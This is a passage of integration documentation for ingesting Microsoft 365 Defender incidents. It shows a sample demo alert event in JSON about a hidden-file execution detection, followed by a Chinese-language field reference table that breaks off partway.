    "elastic_agent": {
        "id": "d0cc4e5a-22d2-441c-b3e3-b77013785358",
        "snapshot": false,
        "version": "8.14.3"
    },
    "event": {
        "action": [
            "detected"
        ],
        "agent_id_status": "verified",
        "created": "2021-08-13T08:43:35.553Z",
        "dataset": "m365_defender.incident",
        "id": "2972395",
        "ingested": "2024-08-12T16:01:29Z",
        "kind": "alert",
        "original": "{\"@odata.type\":\"#microsoft.graph.security.incident\",\"alerts\":{\"@odata.type\":\"#microsoft.graph.security.alert\",\"actorDisplayName\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/da637551227677560813_-961444813?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"assignedTo\":null,\"category\":\"DefenseEvasion\",\"classification\":\"unknown\",\"comments\":[],\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"description\":\"A hidden file has been launched. This activity could indicate a compromised host. Attackers often hide files associated with malicious tools to evade file system inspection and defenses.\",\"detectionSource\":\"antivirus\",\"detectorId\":\"e0da400f-affd-43ef-b1d5-afc2eb6f2756\",\"determination\":\"unknown\",\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":null,\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"defenderAvStatus\":\"unknown\",\"deviceDnsName\":\"tempDns\",\"firstSeenDateTime\":\"2020-09-12T07:28:32.4321753Z\",\"healthStatus\":\"active\",\"loggedOnUsers\":[],\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22424,\"osPlatform\":\"Windows10\",\"rbacGroupId\":75,\"rbacGroupName\":\"UnassignedGroup\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"medium\",\"roles\":[\"compromised\"],\"tags\":[\"Test Machine\"],\"verdict\":\"unknown\",\"version\":\"Other\",\"vmMetadata\":{\"cloudProvider\":\"azure\",\"resourceId\":\"/subscriptions/8700d3a3-3bb7-4fbe-a090-488a1ad04161/resourceGroups/WdatpApi-EUS-STG/providers/Microsoft.Compute/virtualMachines/NirLaviTests\",\"subscriptionId\":\"8700d3a3-3bb7-4fbe-a090-488a1ad04161\",\"vmId\":\"ca1b0d41-5a3b-4d95-b48b-f220aed11d78\"}},{\"@odata.type\":\"#microsoft.graph.security.fileEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"fileDetails\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\\Program Files\\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\\Program Files\\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"parentProcessCreationDateTime\":\"2021-08-12T07:39:09.0909239Z\",\"parentProcessId\":668,\"parentProcessImageFile\":{\"fileName\":\"services.exe\",\"filePath\":\"C:\\\\\Windows\\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":731744,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"\\\"MsSense.exe\\\"\",\"processCreationDateTime\":\"2021-08-12T12:43:19.0772577Z\",\"processId\":4780,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"SYSTEM\",\"azureAdUserId\":null,\"domainName\":\"NT AUTHORITY\",\"userPrincipalName\":null,\"userSid\":\"S-1-5-18\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.registryKeyEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"registryHive\":\"HKEY_LOCAL_MACHINE\",\"registryKey\":\"SYSTEM\\\\\CONTROLSET001\\\\\CONTROL\\\\\WMI\\\\\AUTOLOGGER\\\\\SENSEAUDITLOGGER\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2021-04-26T07:45:50.116Z\",\"id\":\"da637551227677560813_-961444813\",\"incidentId\":\"28282\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/28282?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"lastActivityDateTime\":\"2021-05-02T07:56:58.222Z\",\"lastUpdateDateTime\":\"2021-05-02T14:19:01.3266667Z\",\"mitreTechniques\":[\"T1564.001\"],\"providerAlertId\":\"da637551227677560813_-961444813\",\"recommendedActions\":\"Collect artifacts and determine scope\\n�\\tReview the machine timeline for suspicious activities that may have occurred before and after the time of the alert, and record additional related artifacts (files, IPs/URLs) \\n�\\tLook for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\\n�\\tSubmit relevant files for deep analysis and review resulting detailed behavioral information.\\n�\\tSubmit undetected files to the MMPC malware portal\\n\\nInitiate containment \\u0026 mitigation \\n�\\tContact the user to verify intent and initiate local remediation actions as needed.\\n�\\tUpdate AV signatures and run a full scan. The scan might reveal and remove previously-undetected malware components.\\n�\\tEnsure that the machine has the latest security updates. In particular, ensure that you have installed the latest software, web browser, and Operating System versions.\\n�\\tIf credential theft is suspected, reset all relevant users passwords.\\n�\\tBlock communication with relevant URLs or IPs at the organization�s perimeter.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"low\",\"status\":\"new\",\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious execution of hidden file\"},\"assignedTo\":\"[email protected]\",\"classification\":\"truePositive\",\"comments\":[{\"comment\":\"Demo incident\",\"createdBy\":\"[email protected]\",\"createdTime\":\"2021-09-30T12:07:37.2756993Z\"}],\"createdDateTime\":\"2021-08-13T08:43:35.5533333Z\",\"determination\":\"multiStagedAttack\",\"displayName\":\"Multi-stage incident involving Initial access \\u0026 Command and control on multiple endpoints reported by multiple sources\",\"id\":\"2972395\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47\",\"lastUpdateDateTime\":\"2021-09-30T09:35:45.1133333Z\",\"redirectIncidentId\":null,\"severity\":\"medium\",\"status\":\"active\",\"tags\":[\"Demo\"],\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\"}",
        "provider": "microsoftDefenderForEndpoint",
        "severity": 3,
        "url": "https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47"
    },
    "file": {
        "hash": {
            "sha1": [
                "5f1e8acedc065031aad553b710838eb366cfee9a"
            ],
            "sha256": [
                "8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec"
            ]
        },
        "name": [
            "MsSense.exe"
        ],
        "path": [
            "C:\\Program Files\\temp"
        ],
        "size": [
            6136392
        ]
    },
    "host": {
        "id": [
            "73e7e2de709dff64ef64b1d0c30e67fab63279db"
        ],
        "name": [
            "tempdns"
        ],
        "os": {
            "name": [
                "Windows10"
            ],
            "version": [
                "Other"
            ]
        }
    },
    "input": {
        "type": "httpjson"
    },
    "m365_defender": {
        "incident": {
            "alert": {
                "alert_web_url": {
                    "domain": "security.microsoft.com",
                    "original": "https://security.microsoft.com/alerts/da637551227677560813_-961444813?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c",
                    "path": "/alerts/da637551227677560813_-961444813",
                    "query": "tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c",
                    "scheme": "https"
                },
                "category": "DefenseEvasion",
                "classification": "unknown",
                "created_datetime": "2021-04-27T12:19:27.721Z",
                "description": "A hidden file has been launched. This activity could indicate a compromised host. Attackers often hide files associated with malicious tools to evade file system inspection and defenses.",
                "detection_source": "antivirus",
                "detector_id": "e0da400f-affd-43ef-b1d5-afc2eb6f2756",
                "determination": "unknown",
                "evidence": [
                    {
                        "created_datetime": "2021-04-27T12:19:27.721Z",
                        "defender_av_status": "unknown",
                        "device_dns_name": "tempDns",
                        "first_seen_datetime": "2020-09-12T07:28:32.432Z",
                        "health_status": "active",
                        "mde_device_id": "73e7e2de709dff64ef64b1d0c30e67fab63279db",
                        "odata_type": "#microsoft.graph.security.deviceEvidence",
                        "onboarding_status": "onboarded",
                        "os_build": "22424",
                        "os_platform": "Windows10",
                        "rbac_group": {
                            "id": "75",
                            "name": "UnassignedGroup"
                        },
                        "remediation_status": "none",
                        "risk_score": "medium",
                        "roles": [
                            "compromised"
                        ],
                        "tags": [
                            "Test Machine"
                        ],
                        "verdict": "unknown",
                        "version": "Other",
                        "vm_metadata": {
                            "cloud_provider": "azure",
                            "resource_id": "/subscriptions/8700d3a3-3bb7-4fbe-a090-488a1ad04161/resourceGroups/WdatpApi-EUS-STG/providers/Microsoft.Compute/virtualMachines/NirLaviTests",
                            "subscription_id": "8700d3a3-3bb7-4fbe-a090-488a1ad04161",
                            "vm_id": "ca1b0d41-5a3b-4d95-b48b-f220aed11d78"
                        }
                    },
                    {
                        "created_datetime": "2021-04-27T12:19:27.721Z",
                        "detection_status": "detected",
                        "file_details": {
                            "name": "MsSense.exe",
                            "path": "C:\\Program Files\\temp",
                            "publisher": "Microsoft Corporation",
                            "sha1": "5f1e8acedc065031aad553b710838eb366cfee9a",
                            "sha256": "8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec",
                            "size": 6136392
                        },
                        "mde_device_id": "73e7e2de709dff64ef64b1d0c30e67fab63279db",
                        "odata_type": "#microsoft.graph.security.fileEvidence",
                        "remediation_status": "none",
                        "verdict": "unknown"
                    },
                    {
                        "created_datetime": "2021-04-27T12:19:27.721Z",
                        "detection_status": "detected",
                        "image_file": {
                            "name": "MsSense.exe",
                            "path": "C:\\Program Files\\temp",
                            "publisher": "Microsoft Corporation",
                            "sha1": "5f1e8acedc065031aad553b710838eb366cfee9a",
                            "sha256": "8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec",
                            "size": 6136392
                        },
                        "mde_device_id": "73e7e2de709dff64ef64b1d0c30e67fab63279db",
                        "odata_type": "#microsoft.graph.security.processEvidence",
                        "parent_process": {
                            "creation_datetime": "2021-08-12T07:39:09.090Z",
                            "id": 668,
                            "image_file": {
                                "name": "services.exe",
                                "path": "C:\\Windows\\System32",
                                "publisher": "Microsoft Corporation",
                                "size": 731744
                            }
                        },
                        "process": {
                            "command_line": "\"MsSense.exe\"",
                            "creation_datetime": "2021-08-12T12:43:19.077Z",
                            "id": 4780
                        },
                        "remediation_status": "none",
                        "user_account": {
                            "account_name": "SYSTEM",
                            "domain_name": "NT AUTHORITY",
                            "user_sid": "S-1-5-18"
                        },
                        "verdict": "unknown"
                    },
                    {
                        "created_datetime": "2021-04-27T12:19:27.721Z",
                        "odata_type": "#microsoft.graph.security.registryKeyEvidence",
                        "registry_hive": "HKEY_LOCAL_MACHINE",
                        "registry_key": "SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\AUTOLOGGER\\SENSEAUDITLOGGER",
                        "remediation_status": "none",
                        "verdict": "unknown"
                    }
                ],
                "first_activity_datetime": "2021-04-26T07:45:50.116Z",
                "id": "da637551227677560813_-961444813",
                "incident_id": "28282",
                "incident_web_url": {
                    "domain": "security.microsoft.com",
                    "original": "https://security.microsoft.com/incidents/28282?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c",
                    "path": "/incidents/28282",
                    "query": "tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c",
                    "scheme": "https"
                },
                "last_activity_datetime": "2021-05-02T07:56:58.222Z",
                "last_update_datetime": "2021-05-02T14:19:01.326Z",
                "mitre_techniques": [
                    "T1564.001"
                ],
                "provider_alert_id": "da637551227677560813_-961444813",
                "recommended_actions": "Collect artifacts and determine scope\n�\tReview the machine timeline for suspicious activities that may have occurred before and after the time of the alert, and record additional related artifacts (files, IPs/URLs) \n�\tLook for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n�\tSubmit relevant files for deep analysis and review resulting detailed behavioral information.\n�\tSubmit undetected files to the MMPC malware portal\n\nInitiate containment & mitigation \n�\tContact the user to verify intent and initiate local remediation actions as needed.\n�\tUpdate AV signatures and run a full scan. The scan might reveal and remove previously-undetected malware components.\n�\tEnsure that the machine has the latest security updates. In particular, ensure that you have installed the latest software, web browser, and Operating System versions.\n�\tIf credential theft is suspected, reset all relevant users passwords.\n�\tBlock communication with relevant URLs or IPs at the organization�s perimeter.",
                "service_source": "microsoftDefenderForEndpoint",
                "severity": "low",
                "status": "new",
                "tenant_id": "b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c",
                "title": "Suspicious execution of hidden file"
            },
            "assigned_to": "[email protected]",
            "classification": "truePositive",
            "comments": [
                {
                    "comment": "Demo incident",
                    "createdBy": "[email protected]",
                    "createdTime": "2021-09-30T12:07:37.2756993Z"
                }
            ],
            "created_datetime": "2021-08-13T08:43:35.553Z",
            "determination": "multiStagedAttack",
            "display_name": "Multi-stage incident involving Initial access & Command and control on multiple endpoints reported by multiple sources",
            "id": "2972395",
            "last_update_datetime": "2021-09-30T09:35:45.113Z",
            "odata_type": "#microsoft.graph.security.incident",
            "severity": "medium",
            "status": "active",
            "tags": [
                "Demo"
            ],
            "tenant_id": "b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c",
            "web_url": {
                "domain": "security.microsoft.com",
                "original": "https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47",
                "path": "/incidents/2972395",
                "query": "tid=12f988bf-16f1-11af-11ab-1d7cd011db47",
                "scheme": "https"
            }
        }
    },
    "message": "Multi-stage incident involving Initial access & Command and control on multiple endpoints reported by multiple sources",
    "process": {
        "command_line": [
            "\"MsSense.exe\""
        ],
        "hash": {
            "sha1": [
                "5f1e8acedc065031aad553b710838eb366cfee9a"
            ],
            "sha256": [
                "8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec"
            ]
        },
        "parent": {
            "pid": [
                668
            ],
            "start": [
                "2021-08-12T07:39:09.090Z"
            ]
        },
        "pid": [
            4780
        ],
        "start": [
            "2021-08-12T12:43:19.077Z"
        ],
        "user": {
            "name": [
                "SYSTEM"
            ]
        }
    },
    "registry": {
        "hive": [
            "HKEY_LOCAL_MACHINE"
        ],
        "key": [
            "SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\AUTOLOGGER\\SENSEAUDITLOGGER"
        ]
    },
    "related": {
        "hash": [
            "5f1e8acedc065031aad553b710838eb366cfee9a",
            "8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec"
        ],
        "hosts": [
            "tempDns",
            "NT AUTHORITY"
        ],
        "user": [
            "[email protected]",
            "[email protected]",
            "SYSTEM",
            "S-1-5-18"
        ]
    },
    "source": {
        "user": {
            "name": "[email protected]"
        }
    },
    "tags": [
        "preserve_original_event",
        "preserve_duplicate_custom_fields",
        "forwarded",
        "m365_defender-incident"
    ],
    "threat": {
        "tactic": {
            "name": [
                "DefenseEvasion"
            ]
        },
        "technique": {
            "subtechnique": {
                "id": [
                    "T1564.001"
                ]
            }
        }
    }
}
导出的字段
字段 描述 类型

@timestamp

事件时间戳。

date

cloud.image.id

云实例的镜像 ID。

keyword

data_stream.dataset

数据流数据集。

constant_keyword

data_stream.namespace

数据流命名空间。

constant_keyword

data_stream.type

数据流类型。

constant_keyword

event.dataset

事件数据集。

constant_keyword

event.module

事件模块。

constant_keyword

host.containerized

主机是否为容器。

布尔值

host.os.build

操作系统构建信息。

keyword

host.os.codename

操作系统代号(如果有)。

keyword

input.type

输入类型

keyword

log.offset

日志偏移

long

m365_defender.incident.alert.actor_display_name

与此警报关联的攻击者或活动组。

keyword

m365_defender.incident.alert.alert_web_url.domain

keyword

m365_defender.incident.alert.alert_web_url.extension

keyword

m365_defender.incident.alert.alert_web_url.fragment

keyword

m365_defender.incident.alert.alert_web_url.full

keyword

m365_defender.incident.alert.alert_web_url.original

keyword

m365_defender.incident.alert.alert_web_url.password

keyword

m365_defender.incident.alert.alert_web_url.path

keyword

m365_defender.incident.alert.alert_web_url.port

long

m365_defender.incident.alert.alert_web_url.query

keyword

m365_defender.incident.alert.alert_web_url.scheme

keyword

m365_defender.incident.alert.alert_web_url.username

keyword

m365_defender.incident.alert.assigned_to

警报的所有者,如果未分配所有者,则为 null。

keyword

m365_defender.incident.alert.category

警报所属的攻击杀伤链类别。与 MITRE ATT&CK 框架对齐。

keyword

m365_defender.incident.alert.classification

指定警报是否表示真实威胁。可能的值包括:unknown、falsePositive、truePositive、benignPositive、unknownFutureValue。

keyword

m365_defender.incident.alert.comments

安全运营 (SecOps) 团队在警报管理过程中创建的注释数组。

flattened

m365_defender.incident.alert.created_datetime

Microsoft 365 Defender 创建警报的时间。

date

m365_defender.incident.alert.description

描述每个警报的字符串值。

keyword

m365_defender.incident.alert.detection_source

识别重要组件或活动的检测技术或传感器。

keyword

m365_defender.incident.alert.detector_id

触发警报的检测器的 ID。

keyword

m365_defender.incident.alert.determination

指定调查的结果,警报是否表示真实的攻击,如果是,则指定攻击的性质。可能的值包括:unknown、apt、malware、securityPersonnel、securityTesting、unwantedSoftware、other、multiStagedAttack、compromisedUser、phishing、maliciousUserActivity、clean、insufficientData、confirmedUserActivity、lineOfBusinessApplication、unknownFutureValue。

keyword

m365_defender.incident.alert.evidence.antispam_direction

电子邮件相对于您网络的方向。可能的值包括:Inbound、Outbound 或 Intraorg。

keyword

m365_defender.incident.alert.evidence.app_id

应用程序的唯一标识符。

keyword

m365_defender.incident.alert.evidence.attachments_count

电子邮件中附件的数量。

long

m365_defender.incident.alert.evidence.azure_ad_device_id

当设备加入 Azure AD 时,Azure Active Directory (Azure AD) 分配给设备的唯一标识符。

keyword

m365_defender.incident.alert.evidence.cluster_by

群集中电子邮件的群集逻辑。

keyword

m365_defender.incident.alert.evidence.cluster_by_value

用于聚类相似电子邮件的值。

keyword

m365_defender.incident.alert.evidence.created_datetime

创建证据并将其添加到警报的时间。

date

m365_defender.incident.alert.evidence.defender_av_status

Defender 反恶意软件引擎的状态。可能的值包括:notReporting、disabled、notUpdated、updated、unknown、notSupported、unknownFutureValue。

keyword

m365_defender.incident.alert.evidence.delivery_action

电子邮件的送达操作。可能的值包括:Delivered、DeliveredAsSpam、Junked、Blocked 或 Replaced。

keyword

m365_defender.incident.alert.evidence.delivery_location

电子邮件的送达位置。可能的值包括:Inbox、External、JunkFolder、Quarantine、Failed、Dropped、DeletedFolder 或 Forwarded。

keyword

m365_defender.incident.alert.evidence.detection_status

检测的状态。可能的值包括:detected、blocked、prevented、unknownFutureValue。

keyword

m365_defender.incident.alert.evidence.device_dns_name

设备的完全限定域名 (FQDN)。

keyword

m365_defender.incident.alert.evidence.display_name

应用程序的名称。

keyword

m365_defender.incident.alert.evidence.email_count

电子邮件群集中电子邮件的计数。

long

m365_defender.incident.alert.evidence.file_details.issuer

颁发证书的证书颁发机构 (CA)。

keyword

m365_defender.incident.alert.evidence.file_details.name

文件的名称。

keyword

m365_defender.incident.alert.evidence.file_details.odata_type

keyword

m365_defender.incident.alert.evidence.file_details.path

文件实例的文件路径(位置)。

keyword

m365_defender.incident.alert.evidence.file_details.publisher

文件的发布者。

keyword

m365_defender.incident.alert.evidence.file_details.sha1

文件内容的 Sha1 加密哈希值。

keyword

m365_defender.incident.alert.evidence.file_details.sha256

文件内容的 Sha256 加密哈希值。

keyword

m365_defender.incident.alert.evidence.file_details.signer

签名文件的签名者。

keyword

m365_defender.incident.alert.evidence.file_details.size

文件的大小(以字节为单位)。

long

m365_defender.incident.alert.evidence.first_seen_datetime

首次看到设备的日期和时间。

date

m365_defender.incident.alert.evidence.health_status

设备的健康状态。可能的值包括:active(活动)、inactive(非活动)、impairedCommunication(通信受损)、noSensorData(无传感器数据)、noSensorDataImpairedCommunication(无传感器数据且通信受损)、unknown(未知)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.evidence.image_file.issuer

颁发证书的证书颁发机构 (CA)。

keyword

m365_defender.incident.alert.evidence.image_file.name

文件的名称。

keyword

m365_defender.incident.alert.evidence.image_file.odata_type

keyword

m365_defender.incident.alert.evidence.image_file.path

文件实例的文件路径(位置)。

keyword

m365_defender.incident.alert.evidence.image_file.publisher

文件的发布者。

keyword

m365_defender.incident.alert.evidence.image_file.sha1

文件内容的 Sha1 加密哈希值。

keyword

m365_defender.incident.alert.evidence.image_file.sha256

文件内容的 Sha256 加密哈希值。

keyword

m365_defender.incident.alert.evidence.image_file.signer

签名文件的签名者。

keyword

m365_defender.incident.alert.evidence.image_file.size

文件的大小(以字节为单位)。

long

m365_defender.incident.alert.evidence.instance_id

软件即服务 (SaaS) 应用程序实例的标识符。

keyword

m365_defender.incident.alert.evidence.instance_name

SaaS 应用程序实例的名称。

keyword

m365_defender.incident.alert.evidence.internet_message_id

由发送电子邮件系统设置的电子邮件的面向公众的标识符。

keyword

m365_defender.incident.alert.evidence.ip_address

IP 地址的值,可以是 V4 地址格式或 V6 地址格式。

ip

m365_defender.incident.alert.evidence.language

检测到的电子邮件内容的语言。

keyword

m365_defender.incident.alert.evidence.logged_on_users.account_name

已登录用户的用户帐户名称。

keyword

m365_defender.incident.alert.evidence.logged_on_users.domain_name

已登录用户的用户帐户域。

keyword

m365_defender.incident.alert.evidence.logged_on_users.odata_type

keyword

m365_defender.incident.alert.evidence.mde_device_id

Microsoft Defender for Endpoint 为设备分配的唯一标识符。

keyword

m365_defender.incident.alert.evidence.network_message_id

由 Microsoft 365 生成的电子邮件的唯一标识符。

keyword

m365_defender.incident.alert.evidence.network_message_ids

由 Microsoft 365 生成的群集中电子邮件的唯一标识符。

keyword

m365_defender.incident.alert.evidence.object_id

Azure AD 中应用程序对象的唯一标识符。

keyword

m365_defender.incident.alert.evidence.odata_type

keyword

m365_defender.incident.alert.evidence.onboarding_status

计算机加入 Microsoft Defender for Endpoint 的状态。可能的值包括:insufficientInfo(信息不足)、onboarded(已加入)、canBeOnboarded(可加入)、unsupported(不支持)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.evidence.os_build

设备正在运行的操作系统版本号。

keyword

m365_defender.incident.alert.evidence.os_platform

设备正在运行的操作系统平台。

keyword

m365_defender.incident.alert.evidence.p1_sender.display_name

发送者的名称。

keyword

m365_defender.incident.alert.evidence.p1_sender.domain_name

发送者域。

keyword

m365_defender.incident.alert.evidence.p1_sender.email_address

发送者的电子邮件地址。

keyword

m365_defender.incident.alert.evidence.p1_sender.odata_type

keyword

m365_defender.incident.alert.evidence.p2_sender.display_name

发送者的名称。

keyword

m365_defender.incident.alert.evidence.p2_sender.domain_name

发送者域。

keyword

m365_defender.incident.alert.evidence.p2_sender.email_address

发送者的电子邮件地址。

keyword

m365_defender.incident.alert.evidence.p2_sender.odata_type

keyword

m365_defender.incident.alert.evidence.parent_process.creation_datetime

创建进程的父进程的日期和时间。

date

m365_defender.incident.alert.evidence.parent_process.id

生成该进程的父进程的进程 ID (PID)。

long

m365_defender.incident.alert.evidence.parent_process.image_file.issuer

颁发证书的证书颁发机构 (CA)。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.name

文件的名称。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.odata_type

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.path

文件实例的文件路径(位置)。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.publisher

文件的发布者。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.sha1

文件内容的 Sha1 加密哈希值。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.sha256

文件内容的 Sha256 加密哈希值。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.signer

签名文件的签名者。

keyword

m365_defender.incident.alert.evidence.parent_process.image_file.size

文件的大小(以字节为单位)。

long

m365_defender.incident.alert.evidence.primary_address

邮箱的主要电子邮件地址。

keyword

m365_defender.incident.alert.evidence.process.command_line

用于创建新进程的命令行。

keyword

m365_defender.incident.alert.evidence.process.creation_datetime

创建进程的日期和时间。

date

m365_defender.incident.alert.evidence.process.id

新创建进程的进程 ID (PID)。

long

m365_defender.incident.alert.evidence.publisher

应用程序发布者的名称。

keyword

m365_defender.incident.alert.evidence.query

用于标识电子邮件群集的查询。

keyword

m365_defender.incident.alert.evidence.rbac_group.id

基于角色的访问控制 (RBAC) 设备组的 ID。

keyword

m365_defender.incident.alert.evidence.rbac_group.name

RBAC 设备组的名称。

keyword

m365_defender.incident.alert.evidence.received_datetime

接收电子邮件的日期和时间。

date

m365_defender.incident.alert.evidence.recipient_email_address

收件人的电子邮件地址,或通讯组列表展开后的收件人的电子邮件地址。

keyword

m365_defender.incident.alert.evidence.registry_hive

记录的操作所应用的注册表配置单元。

keyword

m365_defender.incident.alert.evidence.registry_key

记录的操作所应用的注册表项。

keyword

m365_defender.incident.alert.evidence.registry_value

记录的操作所应用的注册表值的数据。

keyword

m365_defender.incident.alert.evidence.registry_value_name

记录的操作所应用的注册表值的名称。

keyword

m365_defender.incident.alert.evidence.registry_value_type

记录的操作所应用的注册表值的数据类型,例如二进制或字符串。

keyword

m365_defender.incident.alert.evidence.remediation_status

采取的修正措施的状态。可能的值包括:none(无)、remediated(已修正)、prevented(已阻止)、blocked(已阻止)、notFound(未找到)、active(活动)、pendingApproval(待批准)、declined(已拒绝)、notRemediated(未修正)、running(正在运行)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.evidence.remediation_status_details

有关修正状态的详细信息。

keyword

m365_defender.incident.alert.evidence.risk_score

由 Microsoft Defender for Endpoint 评估的风险评分。可能的值包括:none(无)、informational(信息性)、low(低)、medium(中)、high(高)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.evidence.roles

证据实体在警报中代表的角色,例如,与攻击者关联的 IP 地址将具有证据角色“攻击者”。

keyword

m365_defender.incident.alert.evidence.saas_app_id

SaaS 应用程序的标识符。

keyword

m365_defender.incident.alert.evidence.security_group_id

安全组的唯一标识符。

keyword

m365_defender.incident.alert.evidence.sender_ip

上次检测到的转发邮件的邮件服务器的 IP 地址。

ip

m365_defender.incident.alert.evidence.subject

电子邮件的主题。

keyword

m365_defender.incident.alert.evidence.tags

与证据实例关联的自定义标记数组,例如表示一组设备、高价值资产等。

keyword

m365_defender.incident.alert.evidence.threat_detection_methods

用于检测电子邮件中发现的恶意软件、网络钓鱼或其他威胁的方法的集合。

keyword

m365_defender.incident.alert.evidence.threats

发现的恶意软件或其他威胁的检测名称集合。

keyword

m365_defender.incident.alert.evidence.type

keyword

m365_defender.incident.alert.evidence.url

唯一资源定位器 (URL)。

keyword

m365_defender.incident.alert.evidence.url_count

电子邮件中嵌入的 URL 的数量。

long

m365_defender.incident.alert.evidence.urls

此电子邮件中包含的 URL 的集合。

keyword

m365_defender.incident.alert.evidence.urn

标识群集的自动化调查的统一资源名称 (URN)。

keyword

m365_defender.incident.alert.evidence.user_account.account_name

用户帐户的显示名称。

keyword

m365_defender.incident.alert.evidence.user_account.azure_ad_user_id

Azure AD 中的用户对象标识符。

keyword

m365_defender.incident.alert.evidence.user_account.display_name

Azure AD 中的用户显示名称。

keyword

m365_defender.incident.alert.evidence.user_account.domain_name

用户所属的 Active Directory 域的名称。

keyword

m365_defender.incident.alert.evidence.user_account.odata_type

keyword

m365_defender.incident.alert.evidence.user_account.user_principal_name

Azure AD 中帐户的用户主体名称。

keyword

m365_defender.incident.alert.evidence.user_account.user_sid

用户帐户的本地安全标识符。

keyword

m365_defender.incident.alert.evidence.verdict

自动化调查得出的结论。可能的值包括:unknown(未知)、suspicious(可疑)、malicious(恶意)、noThreatsFound(未发现威胁)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.evidence.version

操作系统平台的版本。

keyword

m365_defender.incident.alert.evidence.vm_metadata.cloud_provider

托管虚拟机的云提供商。可能的值包括:unknown(未知)、azure(Azure)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.evidence.vm_metadata.odata_type

keyword

m365_defender.incident.alert.evidence.vm_metadata.resource_id

Azure 资源的唯一标识符。

keyword

m365_defender.incident.alert.evidence.vm_metadata.subscription_id

客户租户所属的 Azure 订阅的唯一标识符。

keyword

m365_defender.incident.alert.evidence.vm_metadata.vm_id

虚拟机实例的唯一标识符。

keyword

m365_defender.incident.alert.first_activity_datetime

与警报关联的最早活动。

date

m365_defender.incident.alert.id

表示警报资源的唯一标识符。

keyword

m365_defender.incident.alert.incident_id

表示此警报资源与之关联的事件的唯一标识符。

keyword

m365_defender.incident.alert.incident_web_url.domain

keyword

m365_defender.incident.alert.incident_web_url.extension

keyword

m365_defender.incident.alert.incident_web_url.fragment

